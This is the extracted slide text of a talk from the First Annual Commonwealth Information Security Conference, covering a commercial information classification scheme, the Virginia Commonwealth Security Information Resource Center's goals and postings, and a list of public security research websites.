Commercial Information Classification System• Public

– Similar to unclassified information– Disclosure would not result in damage

• Sensitive– Information requires controls to prevent the release to

unauthorized parties– Disclosure would result in some damage

• Private– Information is primary personal in nature– Can include employee or medical records

• Confidential– Information has the most sensitive rating– Information is required to keep the company competitive– The information should never be released

Commonwealth Security Information Resource Center

• http://www.csirc.vita.virginia.gov• Two Main Goals

– Create a place to provide security information that is relative to the Commonwealth

• Includes security topics within the COV government• Addresses topics for those with interests in the security

community– Citizens, businesses, other states, etc.

– Create a source for providing threat data to third parties• Summary threat data for public viewing• Detailed threat data available for appropriate parties

Security Information• Types of information posted

– Security advisories• Advisories affecting the Commonwealth government

computing environment– Phishing scams

• Attempts to gather information from users that will be useful for malicious activity

– Information security tips• How to integrate security into daily activity

– News• The latest news about information security that would be

useful to the government and it’s constituents– Threat data

• Information showing statistics about the top attackers targeting the Commonwealth.

Security Research URLsInternet Storm Center

http://isc.sans.org/

SANS Reading Roomhttps://www.sans.org/reading_room/

OWASP http://www.owasp.org/index.php/Main_Page

Security Focus http://www.securityfocus.com/

US-CERThttp://www.us-cert.gov

Team Cymruhttp://www.team-cymru.org/

Questions???For more information, please contact:

[email protected]

For more information on topics discussed in this presentation:

[email protected]

Thank You!

First Annual Commonwealth Information Security Conference .

Documents

Transcript of First Annual Commonwealth Information Security Conference .